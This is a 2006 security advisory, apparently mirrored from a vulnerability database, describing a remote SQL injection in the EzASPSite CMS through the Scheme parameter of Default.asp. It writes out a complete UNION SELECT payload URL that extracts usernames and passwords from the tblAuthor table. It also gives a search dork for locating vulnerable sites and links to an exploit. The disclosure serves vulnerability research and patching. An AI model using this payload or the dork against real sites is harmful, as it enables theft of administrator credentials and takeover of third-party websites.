Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12060
HistoryApr 02, 2006 - 12:00 a.m.

EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability.

2006-04-0200:00:00
vulners.com
12

–Security Report–
Advisory: EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit Vulnerability.

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 29/03/06 21:33 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: EzASPSite (http://www.ezaspsite.com)
Version: 2.0 RC3 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to
Scheme parameter in Default.asp
Level: Critical

How&Example:
GET -> http://[victim]/[EZASPDir]/Default.asp?Scheme=[SQL]
EXAMPLE ->

http://[victim]/[EZASPDir]/Default.asp?Scheme=-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',
0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1
with this examples remote attacker can leak speficied users login information
from database.

Timeline:

  • 29/03/2006: Vulnerability found.
  • 29/03/2006: Contacted with vendor and waiting reply.

Exploit:
http://www.nukedx.com/?getxpl=22

Dorks: "Powered By EzASPSite v2.0 RC3"

Original advisory can be found at: http://www.nukedx.com/?viewdoc=22